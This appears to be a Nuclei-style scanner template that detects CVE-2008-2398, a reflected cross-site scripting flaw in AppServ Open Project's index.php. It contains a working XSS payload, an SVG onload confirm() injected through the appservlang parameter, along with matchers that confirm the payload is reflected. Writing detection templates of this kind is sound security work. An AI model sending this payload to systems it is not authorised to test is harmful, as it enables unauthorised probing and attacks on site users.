29 lines
810 B
YAML
29 lines
810 B
YAML
id: CVE-2008-2398
|
|
|
|
info:
|
|
name: AppServ Open Project 2.5.10 and earlier XSS
|
|
author: unstabl3
|
|
severity: medium
|
|
description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
|
|
reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
|
tags: cve,cve2008,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "<svg/onload=confirm('xss')>"
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header |